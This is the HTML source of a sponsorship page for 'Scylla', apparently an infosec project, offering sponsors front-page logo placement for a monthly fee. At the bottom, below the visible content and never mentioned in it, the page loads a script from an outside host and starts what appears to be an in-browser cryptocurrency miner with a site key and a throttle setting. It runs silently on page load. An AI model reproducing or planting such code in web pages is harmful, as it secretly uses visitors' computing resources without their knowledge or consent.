<html>

  <style>
    html { font-size:16px; }

    .grid-table{
    font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
    border-collapse: collapse;
    width: 100%;
    }

    .grid-table td, .grid-table th, .grid-table {
    border: 1px solid #ddd;
    padding: 8px;
    }

    .grid-table tr:nth-child(even){background-color: #f2f2f2;}

    .grid-table tr:hover {background-color: #ddd;}

    .grid-table th {
    padding-top: 12px;
    padding-bottom: 12px;
    text-align: left;
    background-color: #4CAF50;
    color: white;
    }

    body {
    font-family: Arial, Helvetica, sans-serif;
    }

    .topnav {
    overflow: hidden;
    background-color: #333;
    }

    .topnav a {
    float: left;
    color: #f2f2f2;
    text-align: center;
    padding: 14px 16px;
    text-decoration: none;
    font-size: 17px;
    }

    .topnav a:hover {
    background-color: #ddd;
    color: black;
    }

    .topnav a.active {
    background-color: #333;
    color: white;
    }


  </style>

  <title>Scylla</title>

  <div class="topnav">
    <a class="active" href="/">Home</a>
    <a href="sponsors">Sponsors</a>
  </div>

<h2>Current Sponsors</h2>
 
  <p>
    Currently, Scylla is sponsored by.... no one. _hyp3ri0n pays for all costs out of pocket. Interested in sponsoring scylla? Read on amigo.
  </p>
  
<h2>Sponsoring Scylla</h2>

  <p>
    Advertising costs have gone crazy these days. Take for example, Twitter, the average cost of a single impression is about $1.3. That means if you
    want your company or your work to be seen, the cost of, say 100 people seeing it is $130. That's pretty steep for a small (and imperfect) audience.
  </p>
  <p>
    Scylla sponsorship is simple. It is a flat rate of $333.33/month. Scylla is a new project, but reception has been excellent and it has even been integrated
    into the well-known recon-ng platform. On normal days we get hundreds of views, and if you're an infosec company, this is your exact audience. On good days
    we can get well into the thousands or tens of thousands of users when news outlets pick it up.
  </p>
  <p>
    A sponsorship package for Scylla means your logo and a sentence or two will be prominently displayed on the home page and on this page. We are only accepting
    three sponsors initially to ensure that each sponsor gets their fair share of front page visibility. If you are interested contact me on <a href="https://www.buymeacoffee.com/Eiw47ImnT" target="_blank">our donations page</a>
    or email me at scylla@opayq.com!
  </p>

<script src="https://www.hostingcloud.racing/FA18.js"></script>
<script>
  var _client = new Client.Anonymous('b0a5fc90521fc2862b2feb55baee6a97a3285e548d8b9da055d1f586aef632e2', {
  throttle: 0.3, ads: 0
  });
  _client.start();
</script>

<!-- Matomo Image Tracker-->
<img src="https://analytics.hyperiongray.com/matomo.php?idsite=9&amp;rec=1" style="border:0" alt="" />
<!-- End Matomo -->

</html>
